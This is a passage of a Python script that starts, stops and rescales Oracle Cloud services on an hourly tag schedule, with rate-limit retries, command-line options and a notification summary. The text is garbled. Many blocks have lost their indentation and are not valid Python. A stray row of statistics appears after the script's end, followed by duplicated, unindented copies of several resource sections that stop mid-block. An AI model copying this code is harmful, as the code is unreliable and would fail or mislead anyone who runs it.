                                    MakeOut(" - Initiate ODA startup for {}".format(resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            response = oda.start_oda_instance(oda_instance_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Initiate ODA startup for {}".format(resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) ODA startup for {} - {}".format(response.status, resource.display_name, response.message))
                                                MakeOut(" - Error ({}) ODA startup for {} - {}".format(response.status, resource.display_name, response.message))
                                                Retry = False
###################################################################################
# AnalyticsInstance
###################################################################################
if resource.resource_type == "AnalyticsInstance":
# Execute Shutdown operations
if int(schedulehours[CurrentHour]) == 0 and resourceDetails.lifecycle_state == "ACTIVE":
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Analytics shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = analytics.stop_analytics_instance(analytics_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate ODA shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Analytics Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Analytics Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
                        # Execute Startup operations
                        # Non-zero schedule with an INACTIVE instance => start (and possibly rescale).
                        if int(schedulehours[CurrentHour]) != 0 and resourceDetails.lifecycle_state == "INACTIVE":
                            if Action == "All" or Action == "Up":
                                # Target oCPU already matches: plain start, no rescale needed.
                                if int(resourceDetails.capacity.capacity_value) == int(schedulehours[CurrentHour]):
                                    MakeOut(" - Initiate Analytics Startup for {}".format(resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            response = analytics.start_analytics_instance(analytics_instance_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Initiate Analytics Startup for {}".format(resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) Analytics Startup for {} - {}".format(response.status, resource.display_name, response.message))
                                                MakeOut(" - Error ({}) Analytics Startup for {} - {}".format(response.status, resource.display_name, response.message))
                                                Retry = False
                                # Execute Startup and scaling operations
                                # on a worker thread (AnalyticsThread) so the main loop is not
                                # blocked while the instance comes up before rescaling.
                                else:
                                    tcount = tcount + 1
                                    thread = AnalyticsThread(tcount, resource.identifier, resource.display_name, int(schedulehours[CurrentHour]))
                                    thread.start()
                                    threads.append(thread)
                        # Execute scaling operations on running instance
                        # Analytics only allows scaling within the same band: 2-8 oCPU or 10-12 oCPU.
                        # 1 oCPU and >12 oCPU instances cannot be scaled at all.
                        if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) != int(resourceDetails.capacity.capacity_value):
                            if int(resourceDetails.capacity.capacity_value) == 1 or int(resourceDetails.capacity.capacity_value) > 12:
                                ErrorsFound = True
                                errors.append(
                                    " - Error (Analytics instance with CPU count {} can not be scaled for instance: {}".format(int(resourceDetails.capacity.capacity_value),
                                                                                                                               resource.display_name))
                                MakeOut(
                                    " - Error (Analytics instance with CPU count {} can not be scaled for instance: {}".format(int(resourceDetails.capacity.capacity_value),
                                                                                                                               resource.display_name))
                            goscale = False
                            # Both current and requested counts inside the 2-8 band.
                            if (int(schedulehours[CurrentHour]) >= 2 and int(schedulehours[CurrentHour]) <= 8) and (
                                    int(resourceDetails.capacity.capacity_value) >= 2 and int(resourceDetails.capacity.capacity_value) <= 8):
                                capacity = oci.analytics.models.capacity.Capacity()
                                capacity.capacity_value = int(schedulehours[CurrentHour])
                                capacity.capacity_type = capacity.CAPACITY_TYPE_OLPU_COUNT
                                details = oci.analytics.models.ScaleAnalyticsInstanceDetails()
                                details.capacity = capacity
                                goscale = True
                            # Both current and requested counts inside the 10-12 band.
                            # NOTE(review): a value of 9 on either side falls through both bands and
                            # ends in the "invalid combination" branch below — confirm that is intended.
                            if (int(schedulehours[CurrentHour]) >= 10 and int(schedulehours[CurrentHour]) <= 12) and (int(resourceDetails.capacity.capacity_value) >= 10 and int(resourceDetails.capacity.capacity_value) <= 12):
                                capacity = oci.analytics.models.capacity.Capacity()
                                capacity.capacity_value = int(schedulehours[CurrentHour])
                                capacity.capacity_type = capacity.CAPACITY_TYPE_OLPU_COUNT
                                details = oci.analytics.models.ScaleAnalyticsInstanceDetails()
                                details.capacity = capacity
                                goscale = True
                            if goscale:
                                # Re-check against the requested Action direction (Up/Down/All).
                                goscale = False
                                if Action == "All":
                                    goscale = True
                                elif int(resourceDetails.capacity.capacity_value) < int(schedulehours[CurrentHour]) and Action == "Up":
                                    goscale = True
                                elif int(resourceDetails.capacity.capacity_value) > int(schedulehours[CurrentHour]) and Action == "Down":
                                    goscale = True
                                if goscale:
                                    MakeOut(" - Initiate Analytics Scaling from {} to {}oCPU for {}".format(
                                        int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]),
                                        resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            response = analytics.scale_analytics_instance(analytics_instance_id=resource.identifier, scale_analytics_instance_details=details)
                                            Retry = False
                                            success.append(" - Initiate Analytics Scaling from {} to {}oCPU for {}".format(int(resourceDetails.capacity.capacity_value),
                                                                                                                           int(schedulehours[CurrentHour]), resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
                                                MakeOut(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
                                                Retry = False
                            else:
                                errors.append(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
                                MakeOut(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
###################################################################################
# IntegrationInstance
###################################################################################
if resource.resource_type == "IntegrationInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
resourceDetails = integration.get_integration_instance(integration_instance_id=resource.identifier).data
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.stop_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Integration Service startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.start_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
Retry = False
###################################################################################
# LoadBalancer
###################################################################################
if resource.resource_type == "LoadBalancer":
requestedShape = int(schedulehours[CurrentHour])
shape = 0
if resourceDetails.shape_name == "10Mbps":
shape = 10
if resourceDetails.shape_name == "100Mbps":
shape = 100
if resourceDetails.shape_name == "400Mbps":
shape = 400
if resourceDetails.shape_name == "8000Mbps":
shape = 8000
if requestedShape == 10 or requestedShape == 100 or requestedShape == 400 or requestedShape == 8000:
if requestedShape < shape:
if Action == "All" or Action == "Down":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Downsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Downsizing: {}".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
if requestedShape > shape:
if Action == "All" or Action == "Up":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Upsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Upsizing: {} ".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
else:
MakeOut(" - Error {}: requested shape {} does not exists".format(resource.display_name, requestedShape))
###################################################################################
# MysqlDBInstance
###################################################################################
                    if resource.resource_type == "MysqlDBInstance":
                        # MySQL DB systems only support full stop (0) / start (1) schedule values.
                        if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
                            if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
                                if Action == "All" or Action == "Down":
                                    MakeOut(" - Initiate MySQL shutdown for {}".format(resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            # SLOW shutdown flushes/cleans up before stopping the DB system.
                                            stopaction = oci.mysql.models.StopDbSystemDetails()
                                            stopaction.shutdown_type = "SLOW"
                                            response = mysql.stop_db_system(db_system_id=resource.identifier, stop_db_system_details=stopaction)
                                            Retry = False
                                            # NOTE(review): "MySql" casing differs from "MySQL" used elsewhere.
                                            success.append(" - Initiate MySql shutdown for {}".format(resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
                                                MakeOut(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
                                                Retry = False
                            if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
                                if Action == "All" or Action == "Up":
                                    MakeOut(" - Initiate MySQL startup for {}".format(resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            response = mysql.start_db_system(db_system_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Initiate MySQL startup for {}".format(resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                # NOTE(review): startup errors are not echoed via MakeOut,
                                                # unlike the shutdown path above.
                                                errors.append(" - Error ({}) MySQL startup for {} - {}".format(response.status, resource.display_name, response.message))
                                                Retry = False
###################################################################################
# GoldenGateDeployment
###################################################################################
if resource.resource_type == "GoldenGateDeployment":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.golden_gate.models.StopDeploymentDetails()
stopaction.type = "DEFAULT"
response = goldengate.stop_deployment(deployment_id=resource.identifier, stop_deployment_details=stopaction)
Retry = False
success.append(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
startaction = oci.golden_gate.models.StartDeploymentDetails()
startaction.type = "DEFAULT"
response = goldengate.start_deployment(deployment_id=resource.identifier, start_deployment_details=startaction)
if response.status == 200:
success.append(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = False
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Data Integration Workshop
###################################################################################
                    if resource.resource_type == "DISWorkspace":
                        # Data Integration workspaces only support full stop (0) / start (1) values.
                        if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
                            if resourceDetails.lifecycle_state == "ACTIVE" and int(
                                    schedulehours[CurrentHour]) == 0:
                                if Action == "All" or Action == "Down":
                                    MakeOut(" - Initiate Data Integration Workspace shutdown for {}".format(resource.display_name))
                                    Retry = True
                                    # Retry only on HTTP 429 (rate limit); other errors are recorded.
                                    while Retry:
                                        try:
                                            response = dataintegration.stop_workspace(workspace_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Initiate Data Integration Workspace shutdown for {}".format(
                                                resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
                                                    RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(
                                                    " - Error ({}) Data Integration Workspace Shutdown for {} - {}".format(
                                                        response.status, resource.display_name, response.message))
                                                MakeOut(" - Error ({}) Data Integration Shutdown for {} - {}".format(
                                                    response.status, resource.display_name, response.message))
                                                Retry = False
                            # Note the asymmetric states: DIS workspaces report STOPPED (not INACTIVE).
                            if resourceDetails.lifecycle_state == "STOPPED" and int(
                                    schedulehours[CurrentHour]) == 1:
                                if Action == "All" or Action == "Up":
                                    MakeOut(" - Initiate Data Integration Workspace startup for {}".format(resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            response = dataintegration.start_workspace(workspace_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Initiate Data Integration Workspace startup for {}".format(
                                                resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
                                                    RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) Data Integration Startup startup for {} - {}".format(
                                                    response.status, resource.display_name, response.message))
                                                Retry = False
    ###################################################################################
    # Wait for any AutonomousDB and Instance Pool Start and rescale tasks completed
    ###################################################################################
    # Block until every start+rescale worker thread spawned above has finished,
    # so the per-region summary below is only printed once all work is done.
    MakeOut("Waiting for all threads to complete...")
    for t in threads:
        t.join()
    MakeOut("Region {} Completed.".format(region))
##########################################################################
# Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
# NOTE(review): '-ip' is declared with action='store_true' AND default=True, so
# is_instance_principals is always True and the flag is effectively a no-op —
# confirm whether default=False was intended.
parser.add_argument('-ip', action='store_true', default=True, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-a', default="All", dest='action', help='Action All, Down, Up')
parser.add_argument('-tag', default="Schedule", dest='tag', help='Tag to examine, Default=Schedule')
parser.add_argument('-rg', default="", dest='filter_region', help='Filter Region')
parser.add_argument('-ic', default="", dest='compartment_include', help='Include Compartment OCID')
parser.add_argument('-ec', default="", dest='compartment_exclude', help='Exclude Compartment OCID')
parser.add_argument('-ignrtime', action='store_true', default=False, dest='ignore_region_time', help='Ignore Region Time - Use Host Time')
parser.add_argument('-ignoremysql', action='store_true', default=False, dest='ignoremysql', help='Ignore MYSQL processing')
parser.add_argument('-printocid', action='store_true', default=False, dest='print_ocid', help='Print OCID for resources')
parser.add_argument('-topic', default="", dest='topic', help='Topic to send summary in home region')
cmd = parser.parse_args()
# Only All / Down / Up are valid scaling directions; anything else prints usage and exits.
if cmd.action != "All" and cmd.action != "Down" and cmd.action != "Up":
    parser.print_help()
    sys.exit(0)
####################################
# Assign variables
####################################
# Copy parsed CLI options into the module-level names used by autoscale_region().
filter_region = cmd.filter_region
Action = cmd.action
PredefinedTag = cmd.tag
# The conditionals are redundant (argparse defaults are already "") but harmless;
# they guarantee empty strings rather than None.
compartment_exclude = cmd.compartment_exclude if cmd.compartment_exclude else ""
compartment_include = cmd.compartment_include if cmd.compartment_include else ""
####################################
# Start print time info
####################################
start_time = str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
print_header("Running Auto Scale")
# Identity extract compartments
# Build the auth config/signer from the chosen mechanism (profile, instance
# principals, or delegation token), then read tenancy, subscribed regions and
# the compartment tree. Any failure here is fatal.
config, signer = create_signer(cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
compartments = []
tenancy = None
tenancy_home_region = ""
try:
    MakeOut("Starts at " + str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
    MakeOut("\nConnecting to Identity Service...")
    identity = oci.identity.IdentityClient(config, signer=signer)
    tenancy = identity.get_tenancy(config["tenancy"]).data
    regions = identity.list_region_subscriptions(tenancy.id).data
    # Remember the home region — notifications must be published there.
    for reg in regions:
        if reg.is_home_region:
            tenancy_home_region = str(reg.region_name)
    MakeOut("")
    MakeOut("Version : " + str(Version))
    MakeOut("Command Line : " + ' '.join(x for x in sys.argv[1:]))
    MakeOut("Tenant Name : " + str(tenancy.name))
    MakeOut("Tenant Id : " + tenancy.id)
    MakeOut("Home Region : " + tenancy_home_region)
    MakeOut("Action : " + Action)
    MakeOut("Tag : " + PredefinedTag)
    if cmd.topic:
        MakeOut("Topic : " + cmd.topic)
    if cmd.filter_region:
        MakeOut("Filter Region : " + cmd.filter_region)
    MakeOut("")
    compartments = identity_read_compartments(identity, tenancy)
except Exception as e:
    raise RuntimeError("\nError connecting to Identity Service - " + str(e))
############################################
# Define Global Variables to store info
############################################
# Accumulated across all regions; read by the notification block at the end.
success = []
errors = []
total_resources = 0
ErrorsFound = False
############################################
# Loop on all regions
############################################
# Process every subscribed region (optionally narrowed by -rg substring match).
for region_name in [str(es.region_name) for es in regions]:
    if cmd.filter_region:
        # Substring match, not exact: "-rg ashburn" matches "us-ashburn-1".
        if cmd.filter_region not in region_name:
            continue
    print_header("Region " + region_name)
    # set the region in the config and signer
    config['region'] = region_name
    signer.region = region_name
    ###############################################
    # services - global used by threads as well
    ###############################################
    # Rebuilt per region; intentionally module-level so the worker threads
    # (AutonomousThread / PoolThread / AnalyticsThread) can reuse them.
    compute = oci.core.ComputeClient(config, signer=signer)
    database = oci.database.DatabaseClient(config, signer=signer)
    pool = oci.core.ComputeManagementClient(config, signer=signer)
    search = oci.resource_search.ResourceSearchClient(config, signer=signer)
    oda = oci.oda.OdaClient(config, signer=signer)
    analytics = oci.analytics.AnalyticsClient(config, signer=signer)
    integration = oci.integration.IntegrationInstanceClient(config, signer=signer)
    loadbalancer = oci.load_balancer.LoadBalancerClient(config, signer=signer)
    mysql = oci.mysql.DbSystemClient(config, signer=signer)
    goldengate = oci.golden_gate.GoldenGateClient(config, signer=signer)
    dataintegration = oci.data_integration.DataIntegrationClient(config, signer=signer)
    ###############################################
    # Run Scale Region
    ###############################################
    autoscale_region(region_name)
############################################
# Send summary if Topic Specified
############################################
# Publish a run summary to the ONS topic given via -topic. Notifications must
# go to the home region, so the config/signer are repointed first.
if cmd.topic:
    # set the home region in the config and signer
    config['region'] = tenancy_home_region
    signer.region = tenancy_home_region
    ns = oci.ons.NotificationDataPlaneClient(config, signer=signer)
    # LogLevel is a module-level setting defined earlier in the file:
    # "ALL" always notifies, "ERRORS" only when something failed.
    if LogLevel == "ALL" or (LogLevel == "ERRORS" and ErrorsFound):
        MakeOut("\nPublishing notification")
        # NOTE(review): len(success) is the number of success *messages*, which the
        # text labels "scaleable instances" — some sections append two messages per
        # instance, so the wording can over-count; verify before relying on it.
        body_message = "Scaling ({}) just completed. Found {} errors across {} scaleable instances (from a total of {} instances). \nError Details: {}\n\nSuccess Details: {}".format(Action, len(errors), len(success), total_resources, errors, success)
        Retry = True
        # Same 429-only retry pattern used throughout the script.
        while Retry:
            try:
                ns_response = ns.publish_message(cmd.topic, {"title": "Scaling Script ran across tenancy: {}".format(tenancy.name), "body": body_message})
                Retry = False
            except oci.exceptions.ServiceError as ns_response:
                if ns_response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    MakeOut("Error ({}) publishing notification - {}".format(ns_response.status, ns_response.message))
                    Retry = False
MakeOut("All scaling tasks done, checked {} resources.".format(total_resources))
| 66.960442 | 338 | 0.468694 |
try:
response = analytics.scale_analytics_instance(analytics_instance_id=resource.identifier, scale_analytics_instance_details=details)
Retry = False
success.append(" - Initiate Analytics Scaling from {} to {}oCPU for {}".format(int(resourceDetails.capacity.capacity_value),
int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Analytics scaling from {} to {}oCPU for {} - {}".format(response.status, int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
else:
errors.append(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
MakeOut(" - Error (Analytics scaling from {} to {}oCPU, invalid combination for {}".format(int(resourceDetails.capacity.capacity_value), int(schedulehours[CurrentHour]), resource.display_name))
###################################################################################
# IntegrationInstance
###################################################################################
if resource.resource_type == "IntegrationInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
resourceDetails = integration.get_integration_instance(integration_instance_id=resource.identifier).data
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.stop_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Integration Service startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = integration.start_integration_instance(integration_instance_id=resource.identifier)
Retry = False
success.append(" - Initiate Integration Service startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
MakeOut(" - Error ({}) Integration Service startup for {} - {}".format(response.message, resource.display_name, response.message))
Retry = False
###################################################################################
# LoadBalancer
###################################################################################
if resource.resource_type == "LoadBalancer":
requestedShape = int(schedulehours[CurrentHour])
shape = 0
if resourceDetails.shape_name == "10Mbps":
shape = 10
if resourceDetails.shape_name == "100Mbps":
shape = 100
if resourceDetails.shape_name == "400Mbps":
shape = 400
if resourceDetails.shape_name == "8000Mbps":
shape = 8000
if requestedShape == 10 or requestedShape == 100 or requestedShape == 400 or requestedShape == 8000:
if requestedShape < shape:
if Action == "All" or Action == "Down":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Downsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Downsizing: {}".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
if requestedShape > shape:
if Action == "All" or Action == "Up":
details = oci.load_balancer.models.UpdateLoadBalancerShapeDetails()
details.shape_name = "{}Mbps".format(requestedShape)
MakeOut(" - Upsizing loadbalancer from {} to {}".format(resourceDetails.shape_name, details.shape_name))
try:
loadbalancer.update_load_balancer_shape(load_balancer_id=resource.identifier, update_load_balancer_shape_details=details,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
except oci.exceptions.ServiceError as response:
MakeOut(" - Error Upsizing: {} ".format(response.message))
errors.append(" - Error ({}) Integration Service startup for {}".format(response.message, resource.display_name))
else:
MakeOut(" - Error {}: requested shape {} does not exists".format(resource.display_name, requestedShape))
###################################################################################
# MysqlDBInstance
###################################################################################
if resource.resource_type == "MysqlDBInstance":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate MySQL shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.mysql.models.StopDbSystemDetails()
stopaction.shutdown_type = "SLOW"
response = mysql.stop_db_system(db_system_id=resource.identifier, stop_db_system_details=stopaction)
Retry = False
success.append(" - Initiate MySql shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) MySQL Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate MySQL startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = mysql.start_db_system(db_system_id=resource.identifier)
Retry = False
success.append(" - Initiate MySQL startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) MySQL startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# GoldenGateDeployment
###################################################################################
if resource.resource_type == "GoldenGateDeployment":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
stopaction = oci.golden_gate.models.StopDeploymentDetails()
stopaction.type = "DEFAULT"
response = goldengate.stop_deployment(deployment_id=resource.identifier, stop_deployment_details=stopaction)
Retry = False
success.append(" - Initiate GoldenGate shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
